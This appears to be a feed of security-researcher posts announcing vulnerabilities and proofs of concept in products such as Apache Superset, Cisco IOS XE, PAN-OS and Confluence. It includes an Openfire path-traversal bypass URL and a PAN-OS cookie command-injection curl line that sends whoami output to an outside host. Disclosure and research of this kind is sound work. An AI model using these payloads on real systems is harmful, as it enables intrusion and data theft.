CVE-2023-27524, a dangerous default configuration in #Apache #Superset, allows an unauth attacker to: 🔺 Gain RCE 🔺 Harvest Creds 🔺 Compromise Data We estimate there are roughly 2K+ servers on the Internet affected by this issue. horizon3.ai/cve-2023-27524…

CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC. nuclei Template - github.com/projectdiscove… cc Rahul Maini wvu !

ржавый 2.0 nuclei It's been updated now with the PR github.com/projectdiscove… by M4rtin Hsu 🫡

流行代理软件Clash CSRF未授权配置重载致使RCE 0xf4n9x.github.io/2022/10/20/cla…

🚨 1/ Ongoing campaign primarily targeting security researchers here on Twitter. Possibly they are trying to exploit some vulnerability in Internet Explorer and database tools like Navicat. I haven't been able to get the malicious payload yet, but something fishy is going on 🤔

Rapid7 has released a full exploit chain for #MOVEit Transfer CVE-2023-34362. The write-up we've published in AttackerKB contains more than 30 pages of analysis and code — huge shout-out to Ron Bowes, Stephen Fewer, and Curt Fielding for their work on this. attackerkb.com/topics/mXmV0Yp…

🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight. summoning.team/blog/vmware-vr…

#CVE-2023-32315 Openfire Admin Console Auth Bypass #POC: /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp Ref: github.com/advisories/GHS… Credit to Siebene@

Reproducing CVE-2023-38646: Metabase Pre-auth RCE blog.calif.io/p/reproducing-… CC peterjson Janggggg

we're back - causing trouble with more enterprise-grade firewalls :-) join us on the journey... labs.watchtowr.com/yet-more-unaut…

F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclose this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve

🔍 New POC Available! We’ve developed a Proof of Concept for CVE-2023-20198 in #Cisco IOS XE. This authentication-bypass allows an attacker to create new users with privilege level 15. Check out the details in horizon3.ai/cisco-ios-xe-c…

#CVE-2023-20198 #Cisco IOS XE Authentication Bypass #RCE Ref: horizon3.ai/cisco-ios-xe-c…

#CVE-2023-49070 Apache Ofbiz XML-RPC #RCE Affected Versions: < 18.12.10

#CVE-2023-51467 Apache OFBiz auth bypass Groovy #RCE Vulnerability The vuln stems from an incomplete patch fix for the CVE-2023-49070, and a post-auth Groovy RCE.

#CVE-2023-22527 Confluence SSTI #RCE x.com/thedfirreport/…

The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today.

#CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Path Traversal -> File Write -> OS Command Injection POC: curl https://host/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/a`curl${IFS}uip/?u=$(whoami)`'

A SSTI vulnerability in CrushFTP allows an unauthenticated attacker to read files from the file system outside of the VFS sandbox, bypass authentication to gain administrative access, and perform RCE on the server. attackerkb.com/topics/20oYjlm…

🚀 CodeQL zero to hero part 3: Security research with CodeQL! Learn how to audit applications for vulnerabilities with CodeQL, tricks we can use for security research workflow, and how to find bugs in thousands of GitHub repos at once using MRVA. github.blog/2024-04-29-cod…